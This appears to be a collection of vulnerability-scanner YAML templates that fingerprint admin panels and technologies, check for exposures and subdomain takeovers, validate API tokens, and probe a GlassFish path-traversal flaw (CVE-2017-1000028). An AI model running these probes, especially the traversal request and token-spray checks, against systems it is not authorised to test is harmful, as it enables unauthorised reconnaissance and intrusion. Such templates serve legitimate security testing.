-------------------------------------------------------------------------------- /php/phpmyadmin-panel-11.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel11 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /xampp/phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" -------------------------------------------------------------------------------- /php/phpmyadmin-panel-2.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel2 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /admin/phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" -------------------------------------------------------------------------------- /php/phpmyadmin-panel-6.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel6 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /blog/phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" -------------------------------------------------------------------------------- /php/phpmyadmin-panel-7.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel7 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /forum/phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" -------------------------------------------------------------------------------- /php/phpmyadmin-panel-8.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel8 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /php/phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" -------------------------------------------------------------------------------- /php/phpmyadmin-panel-9.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel9 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /typo3/phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" -------------------------------------------------------------------------------- /securenvoy-panel.yaml: -------------------------------------------------------------------------------- 1 | id: securenvoy-panel 2 | 3 | info: 4 | name: SecurEnvoy Admin Login 5 | author: 0xrod 6 | severity: info 7 | tags: panel,securenvoy 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/secadmin/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - '' 19 | part: body 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /symfony/symfony-profiler.yaml: -------------------------------------------------------------------------------- 1 | id: symfony-profiler 2 | 3 | info: 4 | name: Symfony Profiler 5 | author: pdteam 6 | severity: high 7 | tags: config,exposure,symfony 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/_profiler/empty/search/results?limit=10" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Symfony Profiler" 17 | - "symfony/profiler/" 18 | condition: and 19 | part: body 20 | -------------------------------------------------------------------------------- /vm/vmware-horizon.yaml: -------------------------------------------------------------------------------- 1 | id: vmware-horizon 2 | 3 | info: 4 | name: VMware Horizon 5 | author: pdteam 6 | severity: info 7 | tags: vmware,horizon 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | 22 | - type: word 23 | words: 24 | - 'VMware Horizon' 25 | -------------------------------------------------------------------------------- /workspace-one-uem.yaml: -------------------------------------------------------------------------------- 1 | id: workspace-one-uem 2 | 3 | info: 4 | name: Workspace ONE UEM AirWatch Login Page 5 | author: gevakun 6 | severity: info 7 | reference: 8 | - https://twitter.com/Jhaddix/status/1295861505963909120 9 | tags: panel,workspaceone,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/AirWatch/Login" 15 | matchers: 16 | - type: word 17 | words: 18 | - "About VMware AirWatch" 19 | part: body 20 | -------------------------------------------------------------------------------- /zipkin-exposure-1.yaml: -------------------------------------------------------------------------------- 1 | id: zipkin-exposure1 2 | 3 | info: 4 | name: Zipkin Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET / HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - "webpackJsonpzipkin-lens" -------------------------------------------------------------------------------- /a-fingerprinting/mongodb-ops-manager.yaml: -------------------------------------------------------------------------------- 1 | id: mongodb-ops-manager 2 | 3 | info: 4 | name: MongoDB Ops Manager 5 | author: dhiyaneshDK 6 | severity: info 7 | verified: true 8 | reference: 9 | - https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22 10 | 11 | rules: 12 | r0: 13 | request: 14 | method: GET 15 | path: /account/login 16 | expression: response.status == 200 && response.body.bcontains(b'MongoDB Ops Manager') 17 | expression: r0() -------------------------------------------------------------------------------- /adfs-detect.yaml: -------------------------------------------------------------------------------- 1 | id: adfs-detect 2 | 3 | info: 4 | name: ADFS Detect 5 | author: Adam Crosser 6 | severity: info 7 | description: Detects ADFS with forms-based authentication enabled. 8 | tags: tech,adfs 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/adfs/ls/idpinitiatedsignon.aspx" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - '/adfs/portal/css/style.css' 21 | -------------------------------------------------------------------------------- /contacam.yaml: -------------------------------------------------------------------------------- 1 | id: contacam 2 | 3 | info: 4 | name: ContaCam 5 | author: dhiyaneshDk 6 | severity: low 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6831 9 | tags: iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'ContaCam' 20 | part: body 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /cve/2017/CVE-2017-1000028.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-1000028 2 | 3 | info: 4 | name: GlassFish LFI 5 | author: sharecast 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF 13 | follow_redirects: true 14 | expression: response.status == 200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:") 15 | expression: r0() 16 | 17 | -------------------------------------------------------------------------------- /default-fastcgi-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-fastcgi-page 2 | 3 | info: 4 | name: Fastcgi Default Test Page 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.shodan.io/search?query=http.title%3A%22FastCGI%22 9 | tags: tech,fastcgi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | matchers: 16 | - type: word 17 | words: 18 | - "TurnKey NGINX PHP FastCGI Server" 19 | part: body 20 | -------------------------------------------------------------------------------- /default-openresty.yaml: -------------------------------------------------------------------------------- 1 | id: default-openresty 2 | 3 | info: 4 | name: OpenResty Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22 9 | tags: tech,openresty 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | matchers: 16 | - type: word 17 | words: 18 | - "Welcome to OpenResty!" 19 | part: body 20 | -------------------------------------------------------------------------------- /dotclear-detect.yaml: -------------------------------------------------------------------------------- 1 | id: dotclear-detect 2 | 3 | info: 4 | name: Dotclear Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,dotclear 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/dc2/admin/auth.php" 13 | - "{{BaseURL}}/auth.php" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Dotclear" 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /firebase-detect.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-detect 2 | 3 | info: 4 | name: firebase detect 5 | author: organiccrap 6 | severity: low 7 | reference: 8 | - http://ghostlulz.com/google-exposed-firebase-database/ 9 | tags: tech,firebase 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "Could not parse auth token" 20 | part: body 21 | -------------------------------------------------------------------------------- /froxlor-detect.yaml: -------------------------------------------------------------------------------- 1 | id: froxlor-detect 2 | 3 | info: 4 | name: Froxlor Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,froxlor 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Froxlor Server Management Panel" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /jfrog.yaml: -------------------------------------------------------------------------------- 1 | id: jfrog-login 2 | 3 | info: 4 | name: JFrog Login 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6797 9 | tags: panel,jfrog 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/ui/login/' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'JFrog' 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /jira-unauthenticated-user-picker.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-user-picker 2 | 3 | info: 4 | name: Jira Unauthenticated User Picker 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Email' 18 | - 'Full Name' 19 | - 'Username' -------------------------------------------------------------------------------- /mailgun.yaml: -------------------------------------------------------------------------------- 1 | id: api-mailgun 2 | 3 | info: 4 | name: Mailgun API Test 5 | author: zzeitlin 6 | reference: https://documentation.mailgun.com/en/latest/api-intro.html 7 | severity: info 8 | tags: token-spray,mailgun 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.mailgun.net/v3/domains" 14 | headers: 15 | Authorization: Basic {{base64('api:' + token)}} 16 | 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /pingdom-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: pingdom-takeover 2 | 3 | info: 4 | name: pingdom takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Public Report Not Activated 20 | - This public report page has not been activated by the user -------------------------------------------------------------------------------- /powerlogic-ion.yaml: -------------------------------------------------------------------------------- 1 | id: powerlogic-ion 2 | 3 | info: 4 | name: PowerLogic ION Exposed 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6810 9 | tags: panel 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'PowerLogic ION' 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /puppetboard-panel.yaml: -------------------------------------------------------------------------------- 1 | id: puppetboard-panel 2 | 3 | info: 4 | name: Puppetlabs Puppetboard 5 | author: c-sh0 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Puppetboard" 9 | tags: panel,puppet,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | redirects: true 17 | max-redirects: 2 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - "Puppetboard" -------------------------------------------------------------------------------- /spotify.yaml: -------------------------------------------------------------------------------- 1 | id: api-spotify 2 | 3 | info: 4 | name: Spotify API Test 5 | author: zzeitlin 6 | reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ 7 | severity: info 8 | tags: token-spray,spotify 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.spotify.com/v1/me" 14 | headers: 15 | Authorization: Bearer {{token}} 16 | 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /synnefo-admin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: synnefo-admin-panel 2 | 3 | info: 4 | name: Synnefo Admin Panel Exposure 5 | author: impramodsargar 6 | severity: info 7 | tags: panel,synnefo 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/synnefoclient/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Synnefo Admin' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /vercel-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: vercel-takeover 2 | 3 | info: 4 | name: vercel takeover detection 5 | author: pdcommunity 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - The deployment could not be found on Vercel. 19 | - DEPLOYMENT_NOT_FOUND 20 | condition: and --------------------------------------------------------------------------------